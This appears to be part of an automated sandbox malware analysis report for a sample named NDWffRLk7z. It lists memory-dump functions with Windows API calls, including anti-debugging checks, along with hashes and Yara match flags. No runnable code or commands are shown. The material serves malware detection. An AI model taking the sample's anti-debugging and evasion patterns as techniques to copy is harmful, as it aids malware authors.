SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0211DACD), ref: 0213A72C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0211DACD), ref: 0213A739

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 0b508c7244e6c9243c2669246ad21f6c3aaff233549e027cfaa181b66da7e2d4
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: E131C57494122CABCB21DF64DD8879CBBB9BF18711F5042EAE40CA7250E7349B858F48

Function 0042A3C3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49

Function 021400B6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0214008C,00000000,00457970,0000000C,021401E3,00000000,00000002,00000000), ref: 021400D7
TerminateProcess.KERNEL32(00000000,?,0214008C,00000000,00457970,0000000C,021401E3,00000000,00000002,00000000), ref: 021400DE
ExitProcess.KERNEL32 ref: 021400F0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 687e56be3101cce850d1f98873ddcfb5523f76edcac35acfbc27cbf64dd9a2aa
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: BDE0B635040248AFCF166F65DD08A597B6AFB49B96F404024FA099B121CF36EE42CA84

Function 0042FE4F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
ExitProcess.KERNEL32 ref: 0042FE89

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48

Function 0211092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0211095F
GetProcAddress., xrefs: 021109DC, 021109DF, 021109E4
l, xrefs: 02110966

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d486d75307bc883e2e3f020181736d47453b96a2fc3586c5d122d2491ae3b294
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: DD316CB6900609DFDB10CF99C880AAEBBF5FF48324F15405AD845AB314D771EA85CFA4

Function 02148C49 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 02148D13

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: 3c779a857a555c48eec733fc328ce1df0db87dd5d37242dd8e0c59b66b1f88d5
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 2E412672941219AFCB249FB9DC48EEB77B9EF80715F104269F909D7180EB319E81CB50

Function 004389E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438AAC

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58

Function 004351B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203

Strings

GetLocaleInfoEx, xrefs: 004351C1, 004351CB

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D

Function 0213ED37 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
Instruction ID: e9796abf453fac286462a3824f439d396861b21aee1ff401b09a1c3bdd336384
Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
Instruction Fuzzy Hash: FF023D71E402199FDF15CFA9D8807ADBBF6EF48314F25826AD819E7384D731A946CB80

Function 0042EAD0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94

Function 021125FB Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02112622
PostQuitMessage.USER32(00000000), ref: 021127C0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction ID: 696904ca225985d3f2d1b90762b9b9cd827cbb3703ba8b08002daf79025693d9
Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction Fuzzy Hash: 1A411D25A64384A9E630EFA1BC45B2533B0FF64722F10653BD528CB2B2E3B28554C75E

Function 02146F16 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02146F11,?,?,00000008,?,?,0214F3D2,00000000), ref: 02147143

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: d73317997cb6bb81dc6a6822579f1a6e4f3d46eb9418be5ca1545cbce649ace2
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 07B14D316506089FD719CF28C486B65BBE1FF45368F298658E89DCF2E1CB35E992CB40

Function 00436CAF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44

Function 0214B89C Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

Part of subcall function 02142131: _free.LIBCMT ref: 02142190
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0214219D

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0214B8F0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 0dc222090af0a3e28d947355aed750465e234f8c18b428b3362324f9b4086f0a
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: AB21837299820B9FEF249E24DC41BBA73A9EB44718F10017AEE09D6140EF39DA44CB54

Function 0043B635 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99

Function 0214B524 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02140A0C,?,0214BC79,00000000,?,?,?), ref: 0214B596

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
Instruction ID: bc09c67ab488253458bb22153875a2603add47184d5db9ae2dba1160a0be0501
Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
Instruction Fuzzy Hash: A1114C376047015FDB189F38C89167ABB92FF80358B14442DEA4A8B740DB71B643CB40

Function 0043B2BD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784

Function 0214BACC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0214B86A,00000000,00000000,?), ref: 0214BAF8

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 99552275f9f84eb0c4f5efd7032c5c579c2ff05f8663c5c25274f29863db4634
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 66F0D132E88215ABDB389A248809BBA7768EB4075CF054429EC4AA3144EF70EE42C6D0

Function 0214B892 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

Part of subcall function 02142131: _free.LIBCMT ref: 02142190
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0214219D

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0214B8F0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
Instruction ID: 54cafc874edd12fd2c7bac01e5eb748e1ba02a4623d6a584b81e67707fe7d810
Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
Instruction Fuzzy Hash: DB012632B852159BDB14AF74DC80ABA33A9DF05710F0041BAEF06DB281DF359E01CB50

Function 0043B865 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8

Function 0214B5BF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02140A0C,?,0214BC3D,02140A0C,?,?,?,?,?,02140A0C,?,?), ref: 0214B60B

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
Instruction ID: 1cf10ae442a50dc38d620544d26b4b800ee48e0b30d32cf922d1da127201c4d2
Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
Instruction Fuzzy Hash: 50F022363043041FDB145F398C80B7ABB96EF8072CF14442CFA0A8B680DB71D9028B44

Function 0043B358 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788

Function 02145417 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0214046A,?,00000004), ref: 0214546A

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 60df27456eb7a68da272c1d567c44ce1eaec3800517625dc3d24801a108e442a
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: F1F0F631680318BFDB015F60DC01F6E7B22EF14B12F904015FD0966190DF719920AA99

Function 02145024 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0213E644: RtlEnterCriticalSection.NTDLL(01CC0DA5), ref: 0213E653

EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0214505C

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
Instruction ID: 73b96a4099ec066e70cb6debdbb6863dee336fac3cc4800b4a071d6d4d09b8fa
Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
Instruction Fuzzy Hash: AFF08C72A50300EFEB04EF68D801B4C77E2AF15711F104266F904EB2A1CB7599508F49

Function 00434DBD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC

EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49

Function 0214B4D9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0214BC9B,02140A0C,?,?,?,?,?,02140A0C,?,?,?), ref: 0214B510

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
Instruction ID: 1931518eed192f86119985d74d3eb853b22c0dfa892cd8862d28854dbc5fb417
Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
Instruction Fuzzy Hash: ECF0553A34020457CB189F35DC0476ABF90EFC1B64F0A0059FF098B240CB31D942CB90

